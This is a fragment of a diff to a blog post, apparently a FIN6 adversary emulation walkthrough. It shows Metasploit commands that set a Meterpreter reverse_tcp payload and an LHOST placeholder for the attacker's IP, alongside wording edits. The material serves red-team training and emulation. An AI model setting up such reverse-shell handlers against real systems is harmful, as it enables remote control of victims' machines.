kengentenerende/kengentenerende.github.io/_posts/2023-08-02-FIN6 Adversary Emulation - Phase 1.md

 msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
 ```

-Aside from that, we can also see that `LHOST` needs to be set.
-We don’t need to set LPORT because it already matches the option we set for the payload.
+Aside from that, thae `LHOST` needs to be set also.
+We don’t need to set `LPORT` because it already matches the option we set for the payload.

-We can set the LHOST option with the following command:
+We can set the `LHOST` option using the following command:

 ```bash
 set LHOST [Attacker IP]